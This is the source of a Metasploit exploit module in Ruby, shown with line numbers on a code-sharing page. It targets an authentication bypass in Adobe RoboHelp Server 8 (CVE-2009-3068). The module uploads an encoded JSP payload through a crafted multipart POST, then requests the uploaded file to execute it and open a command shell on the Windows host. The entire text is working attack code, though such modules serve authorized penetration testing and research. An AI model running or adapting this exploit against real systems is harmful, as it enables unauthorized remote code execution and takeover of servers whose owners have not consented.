Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
10

11
  include Msf::Exploit::Remote::HttpClient
12

13
  def initialize(info = {})
14
    super(update_info(info,
15
      'Name'           => 'Adobe RoboHelp Server 8 Arbitrary File Upload and Execute',
16
      'Description'    => %q{
17
          This module exploits an authentication bypass vulnerability which
18
        allows remote attackers to upload and execute arbitrary code.
19
      },
20
      'Author'         => [ 'MC' ],
21
      'License'        => MSF_LICENSE,
22
      'Platform'       => 'win',
23
      'Privileged'     => true,
24
      'References'     =>
25
        [
26
          [ 'CVE', '2009-3068' ],
27
          [ 'OSVDB', '57896'],
28
          [ 'URL', 'http://www.intevydis.com/blog/?p=69' ],
29
          [ 'ZDI', '09-066' ],
30
        ],
31
      'Targets'        =>
32
        [
33
          [ 'Universal Windows Target',
34
            {
35
              'Arch'     => ARCH_JAVA,
36
              'Payload'  =>
37
                {
38
                  'DisableNops' => true,
39
                },
40
            }
41
          ],
42
        ],
43
      'DefaultOptions' =>
44
        {
45
          'SHELL' => 'cmd.exe'
46
        },
47
      'DefaultTarget'  => 0,
48
      'DisclosureDate' => '2009-09-23'
49
    ))
50

51
    register_options( [ Opt::RPORT(8080) ])
52
  end
53

54
  def exploit
55

56
    page = Rex::Text.rand_text_alpha_upper(8) + ".jsp"
57
    uid  = rand(20).to_s
58

59
    file =  "-----------------------------#{uid}\r\n"
60
    file << "Content-Disposition: form-data; name=\"filename\"; filename=\"#{page}\"\r\n"
61
    file << "Content-Type: application/x-java-archive\r\n\r\n"
62
    file << payload.encoded
63
    file << "\r\n"
64

65
    print_status("Sending our POST request...")
66

67
    res = send_request_cgi(
68
      {
69
        'uri'		=> '/robohelp/server',
70
        'version'	=> '1.1',
71
        'method'	=> 'POST',
72
        'encode_params' => false,
73
        'data'		=> file,
74
        'headers'	=> {
75
          'Content-Type'		=> 'multipart/form-data; boundary=---------------------------' + uid,
76
          'UID'			=> uid,
77
        },
78
        'vars_get' => {
79
          'PUBLISH' => uid
80
        }
81
      }, 5)
82

83
    if ( res and res.message =~ /OK/ )
84
      id = res['sessionid'].to_s.strip
85

86
      print_status("Got sessionid of '#{id}'. Sending our second request to '#{page}'...")
87
      data = send_request_raw({
88
          'uri'		=> normalize_uri('robohelp', 'robo','reserved', 'web', id, page),
89
          'method'	=> 'GET',
90
          'version'	=> '1.0'
91
      }, 5)
92

93
      handler
94
    else
95
      print_error("No SESSIONID acquired...")
96
      return
97
    end
98
  end
99
end
100

101